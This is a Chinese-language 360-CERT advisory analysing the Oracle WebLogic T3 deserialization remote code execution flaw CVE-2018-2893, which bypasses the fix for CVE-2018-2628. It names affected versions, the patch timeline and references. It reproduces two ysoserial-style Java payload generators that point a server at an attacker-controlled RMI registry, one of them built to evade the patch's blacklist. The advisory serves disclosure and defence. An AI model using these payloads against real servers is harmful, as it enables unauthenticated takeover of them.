7月18日,Oracle官方发布了季度补丁更新,其中修复了一个 Oracle WebLogic Server 远程代码执行漏洞CVE-2018-2893,此漏洞是对编号为 CVE-2018-2628 修复的绕过,攻击者同样可以在未身份验证的情况下对WebLogic进行攻击。
360-CERT 对此漏洞进行了相关分析,认为漏洞影响严重;目前相关PoC已经公开,建议相关用户尽快进行评估升级。
影响版本:
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3
漏洞概况
WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信,由于WebLogic的T3协议和Web协议使用相同的端口,导致在默认情况下,WebLogic Server T3协议通信和Web端具有相同的访问权限。
易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。此漏洞的成功攻击可能导致攻击者接管Oracle WebLogic Server,造成远程代码执行。
CVE-2018-2628
InboundMsgAbbrev 使用 resolveProxyClass 来处理 rmi 接口类型,但仅仅只是对java.rmi.registry.Registry进行比较判断,可通过其他rmi接口构造绕过。
protected Class> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
String[] arr$ = interfaces;
int len$ = interfaces.length;
for(int i$ = 0; i$ < len$; ++i$) {
String intf = arr$[i$];
if(intf.equals("java.rmi.registry.Registry")) {
throw new InvalidObjectException("Unauthorized proxy deserialization");
}
}
return super.resolveProxyClass(interfaces);
}
在公开 PoC 中,通过序列化
RemoteObjectInvocationHandler,利用UnicastRef建立TCP连接获取远端的RMI registry,加载后会进行readObject解析,通过反序列化漏洞造成远程代码执行。
public class JRMPClient2 extends PayloadRunner implements ObjectPayload {
public Activator getObject ( final String command ) throws Exception {
String host;
int port;
int sep = command.indexOf(':');
if ( sep < 0 ) {
port = new Random().nextInt(65535);
host = command;
}
else {
host = command.substring(0, sep);
port = Integer.valueOf(command.substring(sep + 1));
}
ObjID id = new ObjID(new Random().nextInt()); // RMI registry
TCPEndpoint te = new TCPEndpoint(host, port);
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient2.class.getClassLoader(), new Class[] {
Activator.class
}, obj);
return proxy;
}
public static void main ( final String[] args ) throws Exception {
Thread.currentThread().setContextClassLoader(JRMPClient2.class.getClassLoader());
PayloadRunner.run(JRMPClient2.class, args);
}
}
补丁(p27395085_1036_Generic) ,
在WeblogicFilterConfig.class的黑名单中添加了sun.rmi.server.UnicastRef, 进行防御。
public class JRMPClient3 extends PayloadRunner implements ObjectPayload {
public Object streamMessageImpl(byte[] object) {
StreamMessageImpl streamMessage = new StreamMessageImpl();
streamMessage.setDataBuffer(object, object.length);
return streamMessage;
}
public Object getObject (final String command ) throws Exception {
String host;
int port;
int sep = command.indexOf(':');
if (sep < 0) {
port = new Random().nextInt(65535);
host = command;
}
else {
host = command.substring(0, sep);
port = Integer.valueOf(command.substring(sep + 1));
}
ObjID objID = new ObjID(new Random().nextInt()); // RMI registry
TCPEndpoint tcpEndpoint = new TCPEndpoint(host, port);
UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false));
RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);
Object object = Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler);
return streamMessageImpl(Serializer.serialize(object));
}
public static void main ( final String[] args ) throws Exception {
Thread.currentThread().setContextClassLoader(JRMPClient3.class.getClassLoader());
PayloadRunner.run(JRMPClient3.class, args);
}
}
2018-04-18 Oracle 发布季度安全更新,包含CVE-2018-2628补丁
2018-04-18 360-CERT发布 CVE-2018-2628:WebLogic 远程代码执行漏洞分析预警
2018-07-18 Oracle官方发布了季度补丁更新,包含CVE-2018-2893补丁
2018-07-18 360-CERT发布 CVE-2018-2893:WebLogic 远程代码执行漏洞分析预警
Oracle Critical Patch Update Advisory - July 2018
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
知道创宇:Weblogic 反序列化漏洞(CVE-2018-2628)漫谈
http://blog.knownsec.com/2018/04/weblogic-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9Ecve-2018-2628%E6%BC%AB%E8%B0%88/
Oracle WebLogic CVE-2018-2628 patch的绕过
https://github.com/tdy218/ysoserial-cve-2018-2628
【ADLab原创漏洞】WebLogic反序列化漏洞CVE-2018-2893预警
https://mp.weixin.qq.com/s/ca6iox11dV-WL2-37KqTfA